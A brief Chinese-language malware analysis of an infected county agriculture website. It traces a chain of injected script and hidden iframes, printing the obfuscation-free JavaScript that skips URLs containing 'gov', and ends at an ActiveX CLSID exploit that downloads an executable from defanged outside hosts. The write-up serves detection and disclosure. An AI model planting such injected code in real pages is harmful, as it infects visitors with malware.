开某县农业网,Maxthon提示要安装ActiveX控件。
检查网页代码,发现:
/--- <script src=hxxp://***.w**vg0**.cn></script> ---/ #1 hxxp://***.w**vg0**.cn 包含代码: /--- if(document.location.href.indexOf("gov")>=0) {} else {document.write("<div style='display:none'>") document.write("<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>") document.write("</div>")} ---/
其功能为:检查当前网址,如果包含字符串“gov”则无作为,否则输出代码:
/--- <iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe> ---/
#1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index.htm 包含代码:
/--- <iframe src=index2.htm width=100 height=0></Iframe> ---/
#1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index2.htm 包含代码:
/--- <iframe src=ccqm.htm width=100 height=0></iframe> <script src="js.css"></script> ---/
#1.1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/ccqm.htm
利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/ActivcX.exe